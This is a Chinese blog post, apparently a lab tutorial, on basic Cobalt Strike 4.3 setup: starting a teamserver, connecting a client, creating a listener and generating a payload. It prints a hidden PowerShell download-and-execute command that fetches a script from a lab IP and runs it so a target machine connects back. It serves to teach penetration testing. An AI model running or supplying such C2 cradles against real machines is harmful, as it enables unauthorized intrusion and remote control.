Cobalt Strike使用(一)

xiaoeryu Lv5

基本使用

简介:

​ Cobalt Strike作为一款GUI的框架式渗透工具,集成了端口转发、服务扫描、自动化溢出、多模式端口监听、exe\dll\java木马生成、office宏病毒生成、木马捆绑;钓鱼攻击包括:站点克隆、目标信息获取、java执行、浏览器自动攻击等等。

运行环境:

​ Cobalt Strike4.3

​ 首先安装使用前需要安装java环境jre

​ 服务器:kali 或者 Debian会比较好,Ubuntu的话可能会有些端口占用的问题需要处理

​ 客户端:安装jre即可使用(跨平台)

启动:

1. 创建服务器

./teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD]

is the (default) IP address of this Cobalt Strike team server
is the shared password to connect to this server
​ [/path/to/c2.profile] is your Malleable C2 profile
​ [YYYY-MM-DD] is a kill date for Beacon payloads run from this server

2. 客户端连接

  • linux启动方式

./cobaltstrike

  • Windows启动方式

​ 设置好同一个server端IP之后客户端之间可以在Event Log窗口聊天通信

3. 让目标连接上teamserver

3.1. 设置监听器

3.2. 生成攻击载荷

​ 在这里选择给我们的监听器添加一个攻击载荷

​ 添加在和成功之后会有一个弹窗:我们保存这个弹窗中的powershell命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.8:80/b'))"

​ 我们可以看到这个powershell命令的作用是从连接处下载内容并以隐藏的方式执行

3.3. 在目标机上运行

​ 在目标机让命令行运行这段powershell命令可以看到目标机上线

  • 标题: Cobalt Strike使用(一)
  • 作者: xiaoeryu
  • 创建于 : 2021-05-24 17:55:48
  • 更新于 : 2021-05-26 17:32:31
  • 链接: https://github.com/xiaoeryu/2021/05/24/Cobalt-Strike使用(一)/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论